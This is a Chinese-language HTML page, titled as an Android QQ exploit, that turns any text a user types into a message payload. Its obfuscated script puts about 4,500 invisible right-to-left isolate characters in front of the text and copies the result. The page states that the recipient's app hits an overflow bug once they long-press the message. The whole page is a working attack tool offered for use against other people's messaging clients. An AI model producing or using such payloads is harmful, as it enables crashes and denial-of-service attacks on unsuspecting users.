<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>安卓QQ漏洞利用</title>
    <style>
         body {
            font-family: 'ZCOOL KuaiLe', 'YouYuan', 'Microsoft YaHei', sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            margin: 0;
            background-color: #f0f0f0;
            user-select: none; /* 禁止用户选择 */
            -moz-user-select: none; /* Firefox */
            -ms-user-select: none; /* Internet Explorer/Edge */
            -webkit-user-select: none; /* Safari */
        }
        .container {
            background-color: #ffffff;
            padding: 30px 40px;
            border-radius: 10px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
            text-align: center;
            margin: 40px;
            margin-top: 150px;
            display: flex;
            flex-direction: column;
            align-items: center;
        }
        h2 {
            margin-bottom: 20px;
        }
        input {
            width: 100%;
            max-width: 300px;
            padding: 10px;
            margin-bottom: 20px;
            border: 1px solid #ccc;
            border-radius: 20px;
            font-size: 16px;
        }
        button {
            font-family: 'ZCOOL KuaiLe', 'YouYuan', 'Microsoft YaHei', sans-serif;
            padding: 8px 18px;
            border: none;
            border-radius: 20px;
            background-color: #007bff;
            color: #ffffff;
            font-size: 18px;
            cursor: pointer;
        }
        button:hover {
            background-color: #0056b3;
        }
        input {
            font-family: 'ZCOOL KuaiLe', 'YouYuan', 'Microsoft YaHei', sans-serif;
        }
        input:focus {
            border-color: #66afe9;
            outline: 0;
            -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, .6);
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, .6);
        }
        h2 {
            color: #353535;
        }
        span {
            font-family: Arial, Helvetica, sans-serif;
        }
        h4, h2{
            margin: 0;
            margin-bottom: 20px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h2>安卓<span>QQ</span>漏洞利用</h2>
        <h4>生成的文本发送到qq，一旦长按消息就会触发溢出漏洞</h4>
        <input type="text" id="userInput" placeholder="输入要植入的文本">
        <button onclick="copyText()">复制</button>
    </div>
    <script>
      function _0x3a5e(_0xd4e752,_0x50c621){var _0x2d56e5=_0x2d56();return _0x3a5e=function(_0x3a5e7d,_0x51d81a){_0x3a5e7d=_0x3a5e7d-0x10b;var _0x3bf644=_0x2d56e5[_0x3a5e7d];return _0x3bf644;},_0x3a5e(_0xd4e752,_0x50c621);}(function(_0x25c965,_0x240e34){var _0x5cec7b=_0x3a5e,_0xb7cf66=_0x25c965();while(!![]){try{var _0x359933=parseInt(_0x5cec7b(0x10b))/0x1*(parseInt(_0x5cec7b(0x114))/0x2)+-parseInt(_0x5cec7b(0x112))/0x3+-parseInt(_0x5cec7b(0x10e))/0x4+-parseInt(_0x5cec7b(0x10c))/0x5*(parseInt(_0x5cec7b(0x11c))/0x6)+parseInt(_0x5cec7b(0x11b))/0x7*(parseInt(_0x5cec7b(0x115))/0x8)+parseInt(_0x5cec7b(0x11d))/0x9*(-parseInt(_0x5cec7b(0x117))/0xa)+parseInt(_0x5cec7b(0x110))/0xb;if(_0x359933===_0x240e34)break;else _0xb7cf66['push'](_0xb7cf66['shift']());}catch(_0x1bfab5){_0xb7cf66['push'](_0xb7cf66['shift']());}}}(_0x2d56,0x1cd4c));function copyText(){var _0x572583=_0x3a5e,_0x50292e=document[_0x572583(0x10f)]('userInput')[_0x572583(0x11a)],_0x1ba5b1=Array(0x117d)[_0x572583(0x119)]('⁧')[_0x572583(0x113)](''),_0x8c8419=_0x1ba5b1+_0x50292e,_0x5e3afc=document['createElement'](_0x572583(0x111));_0x5e3afc[_0x572583(0x11a)]=_0x8c8419,document[_0x572583(0x120)][_0x572583(0x11e)](_0x5e3afc),_0x5e3afc[_0x572583(0x116)](),document[_0x572583(0x118)](_0x572583(0x10d)),document[_0x572583(0x120)][_0x572583(0x11f)](_0x5e3afc),alert('已复制:\x20'+_0x8c8419);}function _0x2d56(){var _0x367362=['3746336fpILJA','textarea','7398XhirWo','join','20jjxSGc','16eUxvWM','select','1862220MOIaeQ','execCommand','fill','value','206164qoRNXa','6BgbVmz','9LPGzwY','appendChild','removeChild','body','4133lYvoCK','536785txXFkI','copy','106692qszkiM','getElementById'];_0x2d56=function(){return _0x367362;};return _0x2d56();}
    </script>

</body>
</html>
